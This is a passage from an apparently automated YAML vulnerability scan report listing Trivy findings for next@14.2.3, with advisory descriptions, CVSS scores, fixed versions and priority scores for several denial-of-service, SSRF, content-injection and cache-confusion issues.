versions 19.0.x, 19.1.x, and 19.2.x and frameworks that use the affected packages,
including Next.js 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is
tracked upstream as [CVE-2026-23864](https://github.com/facebook/react/security/advisories/GHSA-83fc-fqcc-2hmg).
A specially crafted HTTP request can be sent to any App Router Server Function
endpoint that, when deserialized, may trigger excessive CPU usage, out-of-memory
exceptions, or server crashes. This can result in denial of service in unpatched
environments.'
remediation: https://github.com/advisories/GHSA-h25m-26qc-wcjf
references: []
tags:
- vulnerability
- pkg:next@14.2.3
raw:
VulnerabilityID: GHSA-h25m-26qc-wcjf
PkgID: next@14.2.3
PkgName: next
PkgIdentifier:
PURL: pkg:npm/next@14.2.3
UID: 494c23d2c970c8b
InstalledVersion: 14.2.3
FixedVersion: 15.0.8, 15.1.12, 15.2.9, 15.3.9, 15.4.11, 15.5.10, 15.6.0-canary.61,
16.0.11, 16.1.5
Status: fixed
SeveritySource: ghsa
PrimaryURL: https://github.com/advisories/GHSA-h25m-26qc-wcjf
DataSource:
ID: ghsa
Name: GitHub Security Advisory npm
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
Fingerprint: sha256:ff28fec564d432dbea049c0723e9e41bc233533a7d1c711b172100b98425733b
Title: Next.js HTTP request deserialization can lead to DoS when using insecure
React Server Components
Description: 'A vulnerability affects certain React Server Components packages
for versions 19.0.x, 19.1.x, and 19.2.x and frameworks that use the affected
packages, including Next.js 13.x, 14.x, 15.x, and 16.x using the App Router.
The issue is tracked upstream as [CVE-2026-23864](https://github.com/facebook/react/security/advisories/GHSA-83fc-fqcc-2hmg).
A specially crafted HTTP request can be sent to any App Router Server Function
endpoint that, when deserialized, may trigger excessive CPU usage, out-of-memory
exceptions, or server crashes. This can result in denial of service in unpatched
environments.'
Severity: HIGH
VendorSeverity:
ghsa: 3
CVSS:
ghsa:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
V3Score: 7.5
References:
- https://github.com/facebook/react/security/advisories/GHSA-83fc-fqcc-2hmg
- https://github.com/vercel/next.js
- https://github.com/vercel/next.js/security/advisories/GHSA-h25m-26qc-wcjf
- https://nvd.nist.gov/vuln/detail/CVE-2026-23864
- https://vercel.com/changelog/summary-of-cve-2026-23864
PublishedDate: '2026-01-28T15:38:01Z'
LastModifiedDate: '2026-01-28T15:38:01Z'
context:
sbom:
name: next
version: 14.2.3
path: /package-lock.json
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 23.333333333333336
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 7
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 2384ada699a3c38e
ruleId: GHSA-mwv6-3258-q52c
severity: HIGH
tool:
name: trivy
version: unknown
location:
path: package-lock.json
startLine: 0
message: Next Vulnerable to Denial of Service with Server Components
title: GHSA-mwv6-3258-q52c
description: 'A vulnerability affects certain React packages for versions 19.0.0,
19.0.1, 19.1.0, 19.1.1, 19.1.2, 19.2.0, and 19.2.1 and frameworks that use the
affected packages, including Next.js 15.x and 16.x using the App Router. The issue
is tracked upstream as [CVE-2025-55184](https://www.cve.org/CVERecord?id=CVE-2025-55184).
A malicious HTTP request can be crafted and sent to any App Router endpoint that,
when deserialized, can cause the server process to hang and consume CPU. This
can result in denial of service in unpatched environments.'
remediation: https://github.com/advisories/GHSA-mwv6-3258-q52c
references: []
tags:
- vulnerability
- pkg:next@14.2.3
raw:
VulnerabilityID: GHSA-mwv6-3258-q52c
PkgID: next@14.2.3
PkgName: next
PkgIdentifier:
PURL: pkg:npm/next@14.2.3
UID: 494c23d2c970c8b
InstalledVersion: 14.2.3
FixedVersion: 14.2.34, 15.0.6, 15.1.10, 15.2.7, 15.3.7, 15.4.9, 15.5.8, 15.6.0-canary.59,
16.0.9, 16.1.0-canary.17
Status: fixed
SeveritySource: ghsa
PrimaryURL: https://github.com/advisories/GHSA-mwv6-3258-q52c
DataSource:
ID: ghsa
Name: GitHub Security Advisory npm
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
Fingerprint: sha256:618188aa35b0d11fb0379e3452fe5b242450d218f40d168c6f6557825e95070a
Title: Next Vulnerable to Denial of Service with Server Components
Description: 'A vulnerability affects certain React packages for versions 19.0.0,
19.0.1, 19.1.0, 19.1.1, 19.1.2, 19.2.0, and 19.2.1 and frameworks that use the
affected packages, including Next.js 15.x and 16.x using the App Router. The
issue is tracked upstream as [CVE-2025-55184](https://www.cve.org/CVERecord?id=CVE-2025-55184).
A malicious HTTP request can be crafted and sent to any App Router endpoint
that, when deserialized, can cause the server process to hang and consume CPU.
This can result in denial of service in unpatched environments.'
Severity: HIGH
VendorSeverity:
ghsa: 3
CVSS:
ghsa:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
V3Score: 7.5
References:
- https://github.com/vercel/next.js
- https://github.com/vercel/next.js/security/advisories/GHSA-mwv6-3258-q52c
- https://nextjs.org/blog/security-update-2025-12-11
- https://www.cve.org/CVERecord?id=CVE-2025-55184
PublishedDate: '2025-12-11T22:49:27Z'
LastModifiedDate: '2025-12-11T22:49:28Z'
context:
sbom:
name: next
version: 14.2.3
path: /package-lock.json
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 23.333333333333336
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 7
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 9076a243c95555c6
ruleId: GHSA-q4gf-8mx6-v5v3
severity: HIGH
tool:
name: trivy
version: unknown
location:
path: package-lock.json
startLine: 0
message: Next.js has a Denial of Service with Server Components
title: GHSA-q4gf-8mx6-v5v3
description: 'A vulnerability affects certain React Server Components packages for
versions 19.x and frameworks that use the affected packages, including Next.js
13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked upstream
as [CVE-2026-23869](https://github.com/facebook/react/security/advisories/GHSA-479c-33wc-g2pg).
You can read more about this advisory our [this changelog](https://vercel.com/changelog/summary-of-cve-2026-23869).
A specially crafted HTTP request can be sent to any App Router Server Function
endpoint that, when deserialized, may trigger excessive CPU usage. This can result
in denial of service in unpatched environments.'
remediation: https://github.com/advisories/GHSA-q4gf-8mx6-v5v3
references: []
tags:
- vulnerability
- pkg:next@14.2.3
raw:
VulnerabilityID: GHSA-q4gf-8mx6-v5v3
PkgID: next@14.2.3
PkgName: next
PkgIdentifier:
PURL: pkg:npm/next@14.2.3
UID: 494c23d2c970c8b
InstalledVersion: 14.2.3
FixedVersion: 15.5.15, 16.2.3
Status: fixed
SeveritySource: ghsa
PrimaryURL: https://github.com/advisories/GHSA-q4gf-8mx6-v5v3
DataSource:
ID: ghsa
Name: GitHub Security Advisory npm
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
Fingerprint: sha256:da8071eff38bff6de90b2e9abbd23b85c6d34bf93862a462071e7b8a1af9dee8
Title: Next.js has a Denial of Service with Server Components
Description: 'A vulnerability affects certain React Server Components packages
for versions 19.x and frameworks that use the affected packages, including Next.js
13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked upstream
as [CVE-2026-23869](https://github.com/facebook/react/security/advisories/GHSA-479c-33wc-g2pg).
You can read more about this advisory our [this changelog](https://vercel.com/changelog/summary-of-cve-2026-23869).
A specially crafted HTTP request can be sent to any App Router Server Function
endpoint that, when deserialized, may trigger excessive CPU usage. This can
result in denial of service in unpatched environments.'
Severity: HIGH
VendorSeverity:
ghsa: 3
CVSS:
ghsa:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
V3Score: 7.5
References:
- https://github.com/vercel/next.js
- https://github.com/vercel/next.js/security/advisories/GHSA-q4gf-8mx6-v5v3
- https://vercel.com/changelog/summary-of-cve-2026-23869
PublishedDate: '2026-04-10T15:35:47Z'
LastModifiedDate: '2026-04-10T15:35:47Z'
context:
sbom:
name: next
version: 14.2.3
path: /package-lock.json
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 23.333333333333336
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 7
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 85e92c5109af9055
ruleId: CVE-2024-47831
severity: MEDIUM
tool:
name: trivy
version: unknown
location:
path: package-lock.json
startLine: 0
message: 'next.js: Next.js image optimization has Denial of Service condition'
title: CVE-2024-47831
description: Next.js is a React Framework for the Web. Cersions on the 10.x, 11.x,
12.x, 13.x, and 14.x branches before version 14.2.7 contain a vulnerability in
the image optimization feature which allows for a potential Denial of Service
(DoS) condition which could lead to excessive CPU consumption. Neither the `next.config.js`
file that is configured with `images.unoptimized` set to `true` or `images.loader`
set to a non-default value nor the Next.js application that is hosted on Vercel
are affected. This issue was fully patched in Next.js `14.2.7`. As a workaround,
ensure that the `next.config.js` file has either `images.unoptimized`, `images.loader`
or `images.loaderFile` assigned.
remediation: https://avd.aquasec.com/nvd/cve-2024-47831
references: []
tags:
- vulnerability
- pkg:next@14.2.3
risk:
cwe: &id029
- CWE-674
raw:
VulnerabilityID: CVE-2024-47831
VendorIDs:
- GHSA-g77x-44xx-532m
PkgID: next@14.2.3
PkgName: next
PkgIdentifier:
PURL: pkg:npm/next@14.2.3
UID: 494c23d2c970c8b
InstalledVersion: 14.2.3
FixedVersion: 14.2.7
Status: fixed
SeveritySource: ghsa
PrimaryURL: https://avd.aquasec.com/nvd/cve-2024-47831
DataSource:
ID: ghsa
Name: GitHub Security Advisory npm
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
Fingerprint: sha256:870deb891342fbe836ab949cbe906351d888b979160e220ba5de55491995cc81
Title: 'next.js: Next.js image optimization has Denial of Service condition'
Description: Next.js is a React Framework for the Web. Cersions on the 10.x, 11.x,
12.x, 13.x, and 14.x branches before version 14.2.7 contain a vulnerability
in the image optimization feature which allows for a potential Denial of Service
(DoS) condition which could lead to excessive CPU consumption. Neither the `next.config.js`
file that is configured with `images.unoptimized` set to `true` or `images.loader`
set to a non-default value nor the Next.js application that is hosted on Vercel
are affected. This issue was fully patched in Next.js `14.2.7`. As a workaround,
ensure that the `next.config.js` file has either `images.unoptimized`, `images.loader`
or `images.loaderFile` assigned.
Severity: MEDIUM
CweIDs: *id029
VendorSeverity:
ghsa: 2
nvd: 3
redhat: 2
CVSS:
ghsa:
V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
V40Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U
V3Score: 5.9
V40Score: 4.6
nvd:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
V3Score: 7.5
redhat:
V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
V3Score: 5.9
References:
- https://access.redhat.com/security/cve/CVE-2024-47831
- https://github.com/vercel/next.js
- https://github.com/vercel/next.js/commit/d11cbc9ff0b1aaefabcba9afe1e562e0b1fde65a
- https://github.com/vercel/next.js/security/advisories/GHSA-g77x-44xx-532m
- https://nvd.nist.gov/vuln/detail/CVE-2024-47831
- https://www.cve.org/CVERecord?id=CVE-2024-47831
PublishedDate: '2024-10-14T18:15:05.013Z'
LastModifiedDate: '2024-11-08T15:39:21.823Z'
context:
sbom:
name: next
version: 14.2.3
path: /package-lock.json
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 14.029866666666669
epss: 0.01306
epss_percentile: 0.79982
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.05224
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: ec4e4216710b1a54
ruleId: CVE-2024-56332
severity: MEDIUM
tool:
name: trivy
version: unknown
location:
path: package-lock.json
startLine: 0
message: 'next.js: Next.js Vulnerable to Denial of Service (DoS) with Server Actions'
title: CVE-2024-56332
description: 'Next.js is a React framework for building full-stack web applications.
Starting in version 13.0.0 and prior to versions 13.5.8, 14.2.21, and 15.1.2,
Next.js is vulnerable to a Denial of Service (DoS) attack that allows attackers
to construct requests that leaves requests to Server Actions hanging until the
hosting provider cancels the function execution. This vulnerability can also be
used as a Denial of Wallet (DoW) attack when deployed in providers billing by
response times. (Note: Next.js server is idle during that time and only keeps
the connection open. CPU and memory footprint are low during that time.). Deployments
without any protection against long running Server Action invocations are especially
vulnerable. Hosting providers like Vercel or Netlify set a default maximum duration
on function execution to reduce the risk of excessive billing. This is the same
issue as if the incoming HTTP request has an invalid `Content-Length` header or
never closes. If the host has no other mitigations to those then this vulnerability
is novel. This vulnerability affects only Next.js deployments using Server Actions.
The issue was resolved in Next.js 13.5.8, 14.2.21, and 15.1.2. We recommend that
users upgrade to a safe version. There are no official workarounds.'
remediation: https://avd.aquasec.com/nvd/cve-2024-56332
references: []
tags:
- vulnerability
- pkg:next@14.2.3
risk:
cwe: &id030
- CWE-770
raw:
VulnerabilityID: CVE-2024-56332
VendorIDs:
- GHSA-7m27-7ghc-44w9
PkgID: next@14.2.3
PkgName: next
PkgIdentifier:
PURL: pkg:npm/next@14.2.3
UID: 494c23d2c970c8b
InstalledVersion: 14.2.3
FixedVersion: 13.5.8, 14.2.21, 15.1.2
Status: fixed
SeveritySource: ghsa
PrimaryURL: https://avd.aquasec.com/nvd/cve-2024-56332
DataSource:
ID: ghsa
Name: GitHub Security Advisory npm
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
Fingerprint: sha256:0901356f7f4fa09450af3a433f9f257bcba669b0b1a39982832d1306434411e5
Title: 'next.js: Next.js Vulnerable to Denial of Service (DoS) with Server Actions'
Description: 'Next.js is a React framework for building full-stack web applications.
Starting in version 13.0.0 and prior to versions 13.5.8, 14.2.21, and 15.1.2,
Next.js is vulnerable to a Denial of Service (DoS) attack that allows attackers
to construct requests that leaves requests to Server Actions hanging until the
hosting provider cancels the function execution. This vulnerability can also
be used as a Denial of Wallet (DoW) attack when deployed in providers billing
by response times. (Note: Next.js server is idle during that time and only keeps
the connection open. CPU and memory footprint are low during that time.). Deployments
without any protection against long running Server Action invocations are especially
vulnerable. Hosting providers like Vercel or Netlify set a default maximum duration
on function execution to reduce the risk of excessive billing. This is the same
issue as if the incoming HTTP request has an invalid `Content-Length` header
or never closes. If the host has no other mitigations to those then this vulnerability
is novel. This vulnerability affects only Next.js deployments using Server Actions.
The issue was resolved in Next.js 13.5.8, 14.2.21, and 15.1.2. We recommend
that users upgrade to a safe version. There are no official workarounds.'
Severity: MEDIUM
CweIDs: *id030
VendorSeverity:
ghsa: 2
redhat: 2
CVSS:
ghsa:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
V3Score: 5.3
redhat:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
V3Score: 5.3
References:
- https://access.redhat.com/security/cve/CVE-2024-56332
- https://github.com/vercel/next.js
- https://github.com/vercel/next.js/security/advisories/GHSA-7m27-7ghc-44w9
- https://nvd.nist.gov/vuln/detail/CVE-2024-56332
- https://www.cve.org/CVERecord?id=CVE-2024-56332
PublishedDate: '2025-01-03T21:15:13.55Z'
LastModifiedDate: '2025-09-10T15:48:41.83Z'
context:
sbom:
name: next
version: 14.2.3
path: /package-lock.json
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 13.559466666666669
epss: 0.00424
epss_percentile: 0.62356
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.01696
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 396a9deaca66993c
ruleId: CVE-2025-55173
severity: MEDIUM
tool:
name: trivy
version: unknown
location:
path: package-lock.json
startLine: 0
message: 'nextjs: Next.js Content Injection Vulnerability for Image Optimization'
title: CVE-2025-55173
description: Next.js is a React framework for building full-stack web applications.
In versions before 14.2.31 and from 15.0.0 to before 15.4.5, Next.js Image Optimization
is vulnerable to content injection. The issue allowed attacker-controlled external
image sources to trigger file downloads with arbitrary content and filenames under
specific configurations. This behavior could be abused for phishing or malicious
file delivery. This vulnerability has been fixed in Next.js versions 14.2.31 and
15.4.5.
remediation: https://avd.aquasec.com/nvd/cve-2025-55173
references: []
tags:
- vulnerability
- pkg:next@14.2.3
risk:
cwe: &id031
- CWE-20
raw:
VulnerabilityID: CVE-2025-55173
VendorIDs:
- GHSA-xv57-4mr9-wg8v
PkgID: next@14.2.3
PkgName: next
PkgIdentifier:
PURL: pkg:npm/next@14.2.3
UID: 494c23d2c970c8b
InstalledVersion: 14.2.3
FixedVersion: 14.2.31, 15.4.5
Status: fixed
SeveritySource: ghsa
PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-55173
DataSource:
ID: ghsa
Name: GitHub Security Advisory npm
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
Fingerprint: sha256:4f427324d504eade5234a30344e36974820c0e709bf9b4e93f269dc3d12b445e
Title: 'nextjs: Next.js Content Injection Vulnerability for Image Optimization'
Description: Next.js is a React framework for building full-stack web applications.
In versions before 14.2.31 and from 15.0.0 to before 15.4.5, Next.js Image Optimization
is vulnerable to content injection. The issue allowed attacker-controlled external
image sources to trigger file downloads with arbitrary content and filenames
under specific configurations. This behavior could be abused for phishing or
malicious file delivery. This vulnerability has been fixed in Next.js versions
14.2.31 and 15.4.5.
Severity: MEDIUM
CweIDs: *id031
VendorSeverity:
ghsa: 2
redhat: 2
CVSS:
ghsa:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
V3Score: 4.3
redhat:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
V3Score: 4.3
References:
- http://vercel.com/changelog/cve-2025-55173
- https://access.redhat.com/security/cve/CVE-2025-55173
- https://github.com/vercel/next.js
- https://github.com/vercel/next.js/commit/6b12c60c61ee80cb0443ccd20de82ca9b4422ddd
- https://github.com/vercel/next.js/security/advisories/GHSA-xv57-4mr9-wg8v
- https://nvd.nist.gov/vuln/detail/CVE-2025-55173
- https://vercel.com/changelog/cve-2025-55173
- https://www.cve.org/CVERecord?id=CVE-2025-55173
PublishedDate: '2025-08-29T22:15:31.75Z'
LastModifiedDate: '2025-09-08T16:42:57.183Z'
context:
sbom:
name: next
version: 14.2.3
path: /package-lock.json
compliance:
owaspTop10_2021:
- A03:2021
cweTop25_2024:
- id: CWE-20
rank: 4
category: Input Validation
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 13.610133333333334
epss: 0.00519
epss_percentile: 0.67013
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.0207600000000001
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 90791fc1fd7573b4
ruleId: CVE-2025-57752
severity: MEDIUM
tool:
name: trivy
version: unknown
location:
path: package-lock.json
startLine: 0
message: 'nextjs: Next.js Affected by Cache Key Confusion for Image Optimization
API Routes'
title: CVE-2025-57752
description: Next.js is a React framework for building full-stack web applications.
In versions before 14.2.31 and from 15.0.0 to before 15.4.5, Next.js Image Optimization
API routes are affected by cache key confusion. When images returned from API
routes vary based on request headers (such as Cookie or Authorization), these
responses could be incorrectly cached and served to unauthorized users due to
a cache key confusion bug. This vulnerability has been fixed in Next.js versions
14.2.31 and 15.4.5. All users are encouraged to upgrade if they use API routes
to serve images that depend on request headers and have image optimization enabled.
remediation: https://avd.aquasec.com/nvd/cve-2025-57752
references: []
tags:
- vulnerability
- pkg:next@14.2.3
risk:
cwe: &id032
- CWE-524
raw:
VulnerabilityID: CVE-2025-57752
VendorIDs:
- GHSA-g5qg-72qw-gw5v
PkgID: next@14.2.3
PkgName: next
PkgIdentifier:
PURL: pkg:npm/next@14.2.3
UID: 494c23d2c970c8b
InstalledVersion: 14.2.3
FixedVersion: 14.2.31, 15.4.5
Status: fixed
SeveritySource: ghsa
PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-57752
DataSource:
ID: ghsa
Name: GitHub Security Advisory npm
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
Fingerprint: sha256:e3be615ed1140070180ac876273edccfb1b377de96b6e4f65e1ad6ef700e860a
Title: 'nextjs: Next.js Affected by Cache Key Confusion for Image Optimization
API Routes'
Description: Next.js is a React framework for building full-stack web applications.
In versions before 14.2.31 and from 15.0.0 to before 15.4.5, Next.js Image Optimization
API routes are affected by cache key confusion. When images returned from API
routes vary based on request headers (such as Cookie or Authorization), these
responses could be incorrectly cached and served to unauthorized users due to
a cache key confusion bug. This vulnerability has been fixed in Next.js versions
14.2.31 and 15.4.5. All users are encouraged to upgrade if they use API routes
to serve images that depend on request headers and have image optimization enabled.
Severity: MEDIUM
CweIDs: *id032
VendorSeverity:
ghsa: 2
redhat: 2
CVSS:
ghsa:
V3Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
V3Score: 6.2
redhat:
V3Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
V3Score: 6.2
References:
- https://access.redhat.com/security/cve/CVE-2025-57752
- https://github.com/vercel/next.js
- https://github.com/vercel/next.js/commit/6b12c60c61ee80cb0443ccd20de82ca9b4422ddd
- https://github.com/vercel/next.js/pull/82114
- https://github.com/vercel/next.js/security/advisories/GHSA-g5qg-72qw-gw5v
- https://nvd.nist.gov/vuln/detail/CVE-2025-57752
- https://vercel.com/changelog/cve-2025-57752
- https://www.cve.org/CVERecord?id=CVE-2025-57752
PublishedDate: '2025-08-29T22:15:31.963Z'
LastModifiedDate: '2025-09-08T16:43:50.33Z'
context:
sbom:
name: next
version: 14.2.3
path: /package-lock.json
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 13.391466666666664
epss: 0.00109
epss_percentile: 0.28624
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.00436
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 027359ccd596dbb5
ruleId: CVE-2025-57822
severity: MEDIUM
tool:
name: trivy
version: unknown
location:
path: package-lock.json
startLine: 0
message: Next.js Improper Middleware Redirect Handling Leads to SSRF
title: CVE-2025-57822
description: Next.js is a React framework for building full-stack web applications.
Prior to versions 14.2.32 and 15.4.7, when next() was used without explicitly
passing the request object, it could lead to SSRF in self-hosted applications
that incorrectly forwarded user-supplied headers. This vulnerability has been
fixed in Next.js versions 14.2.32 and 15.4.7. All users implementing custom middleware
logic in self-hosted environments are strongly encouraged to upgrade and verify
correct usage of the next() function.
remediation: https://avd.aquasec.com/nvd/cve-2025-57822
references: []
tags:
- vulnerability
- pkg:next@14.2.3
risk:
cwe: &id033
- CWE-918
raw:
VulnerabilityID: CVE-2025-57822
VendorIDs:
- GHSA-4342-x723-ch2f
PkgID: next@14.2.3
PkgName: next
PkgIdentifier:
PURL: pkg:npm/next@14.2.3
UID: 494c23d2c970c8b
InstalledVersion: 14.2.3
FixedVersion: 14.2.32, 15.4.7
Status: fixed
SeveritySource: ghsa
PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-57822
DataSource:
ID: ghsa
Name: GitHub Security Advisory npm
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
Fingerprint: sha256:d25b005e7cf8bac08753ec41dc06257909625a91eeaa10bcc06f3ea028d530e1
Title: Next.js Improper Middleware Redirect Handling Leads to SSRF
Description: Next.js is a React framework for building full-stack web applications.
Prior to versions 14.2.32 and 15.4.7, when next() was used without explicitly
passing the request object, it could lead to SSRF in self-hosted applications
that incorrectly forwarded user-supplied headers. This vulnerability has been
fixed in Next.js versions 14.2.32 and 15.4.7. All users implementing custom
middleware logic in self-hosted environments are strongly encouraged to upgrade
and verify correct usage of the next() function.
Severity: MEDIUM
CweIDs: *id033
VendorSeverity:
ghsa: 2
nvd: 3
CVSS:
ghsa:
V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N
V3Score: 6.5
nvd:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
V3Score: 8.2
References:
- https://github.com/vercel/next.js
- https://github.com/vercel/next.js/commit/9c9aaed5bb9338ef31b0517ccf0ab4414f2093d8
- https://github.com/vercel/next.js/security/advisories/GHSA-4342-x723-ch2f
- https://nvd.nist.gov/vuln/detail/CVE-2025-57822
- https://vercel.com/changelog/cve-2025-57822
PublishedDate: '2025-08-29T22:15:32.143Z'
LastModifiedDate: '2025-09-08T16:41:41.253Z'
context:
sbom:
name: next
version: 14.2.3
path: /package-lock.json
compliance:
owaspTop10_2021:
- A10:2021
cweTop25_2024:
- id: CWE-918
rank: 19
category: SSRF
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 17.501333333333335
epss: 0.07815
epss_percentile: 0.92065
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.3126
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 580a09237cbe3791
ruleId: CVE-2025-59471
severity: MEDIUM
tool:
name: trivy
version: unknown
location:
path: package-lock.json
startLine: 0
message: 'next: NextJS Denial of Service in Image Optimizer'
title: CVE-2025-59471
description: "A denial of service vulnerability exists in self-hosted Next.js applications\
\ that have `remotePatterns` configured for the Image Optimizer. The image optimization\
\ endpoint (`/_next/image`) loads external images entirely into memory without\
\ enforcing a maximum size limit, allowing an attacker to cause out-of-memory\
\ conditions by requesting optimization of arbitrarily large images. This vulnerability\
\ requires that `remotePatterns` is configured to allow image optimization from\
\ external domains and that the attacker can serve or control a large image on\
\ an allowed domain.\r\n\r\nStrongly consider upgrading to 15.5.10 or 16.1.5 to\
\ reduce risk and prevent availability issues in Next applications."
remediation: https://avd.aquasec.com/nvd/cve-2025-59471
references: []
tags:
- vulnerability
- pkg:next@14.2.3
risk:
cwe: &id034
- CWE-400
raw:
VulnerabilityID: CVE-2025-59471
VendorIDs:
- GHSA-9g9p-9gw9-jx7f
PkgID: next@14.2.3
PkgName: next
PkgIdentifier:
PURL: pkg:npm/next@14.2.3
UID: 494c23d2c970c8b
InstalledVersion: 14.2.3
FixedVersion: 15.5.10, 16.1.5
Status: fixed
SeveritySource: ghsa
PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-59471
DataSource:
ID: ghsa
Name: GitHub Security Advisory npm
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
Fingerprint: sha256:5c1c3f76d7551a0dbaa560bc61f2517af1be6d9676bb5cccc73c04f0dd664b11
Title: 'next: NextJS Denial of Service in Image Optimizer'
Description: "A denial of service vulnerability exists in self-hosted Next.js\
\ applications that have `remotePatterns` configured for the Image Optimizer.\
\ The image optimization endpoint (`/_next/image`) loads external images entirely\
\ into memory without enforcing a maximum size limit, allowing an attacker to\
\ cause out-of-memory conditions by requesting optimization of arbitrarily large\
\ images. This vulnerability requires that `remotePatterns` is configured to\
\ allow image optimization from external domains and that the attacker can serve\
\ or control a large image on an allowed domain.\r\n\r\nStrongly consider upgrading\
\ to 15.5.10 or 16.1.5 to reduce risk and prevent availability issues in Next\
\ applications."
Severity: MEDIUM
CweIDs: *id034
VendorSeverity:
ghsa: 2
nvd: 3
redhat: 2
CVSS:
ghsa:
V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
V3Score: 5.9
nvd:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
V3Score: 7.5
redhat:
V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
V3Score: 5.9
References:
- https://access.redhat.com/security/cve/CVE-2025-59471
- https://github.com/vercel/next.js
- https://github.com/vercel/next.js/commit/500ec83743639addceaede95e95913398975156c
- https://github.com/vercel/next.js/commit/e5b834d208fe0edf64aa26b5d76dcf6a176500ec
- https://github.com/vercel/next.js/releases/tag/v15.5.10
- https://github.com/vercel/next.js/releases/tag/v16.1.5
- https://github.com/vercel/next.js/security/advisories/GHSA-9g9p-9gw9-jx7f
- https://nvd.nist.gov/vuln/detail/CVE-2025-59471
- https://www.cve.org/CVERecord?id=CVE-2025-59471
PublishedDate: '2026-01-26T22:15:52.89Z'
LastModifiedDate: '2026-02-13T15:03:20.29Z'
context:
sbom:
name: next
version: 14.2.3
path: /package-lock.json
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 13.347733333333334
epss: 0.00027
epss_percentile: 0.07874
is_kev: false
kev_due_date: null
components:
severity_score: 4
